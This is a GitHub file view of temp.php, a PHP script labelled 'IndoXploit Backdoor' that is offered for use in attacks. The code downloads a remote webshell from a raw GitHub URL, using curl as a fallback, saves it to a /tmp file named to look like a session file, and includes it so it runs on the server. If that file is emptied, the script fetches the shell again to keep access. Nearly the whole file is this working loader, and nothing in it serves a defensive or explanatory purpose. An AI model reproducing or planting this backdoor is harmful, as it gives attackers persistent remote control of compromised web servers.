-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathtemp.php
More file actions
31 lines (28 loc) · 780 Bytes
/
temp.php
File metadata and controls
31 lines (28 loc) · 780 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
# IndoXploit Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell
# Coded by: L0c4lh34rtz - IndoXploit
$URL = 'https://raw.githubusercontent.com/justikail/webshell/main/alfav4.1-tesla.php'; # Backdoor URL
$TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
function M() {
$FGT = @file_get_contents($GLOBALS['URL']);
if(!$FGT) {
echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`;
} else {
$HANDLE = fopen($GLOBALS['TMP'], 'w');
fwrite($HANDLE, $FGT);
fclose($HANDLE);
}
echo '<script>window.location="?LOL";</script>';
}
if(file_exists($TMP)) {
if(filesize($TMP) === 0) {
unlink($TMP);
M();
} else {
include($TMP);
}
} else {
M();
}
?>